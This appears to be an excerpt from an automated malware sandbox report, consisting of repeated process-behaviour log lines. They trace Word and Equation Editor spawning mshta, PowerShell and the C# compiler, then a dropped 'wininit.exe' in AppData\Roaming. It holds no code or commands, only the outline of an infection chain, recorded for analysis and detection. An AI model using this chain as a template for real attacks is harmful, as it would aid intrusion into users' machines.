Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
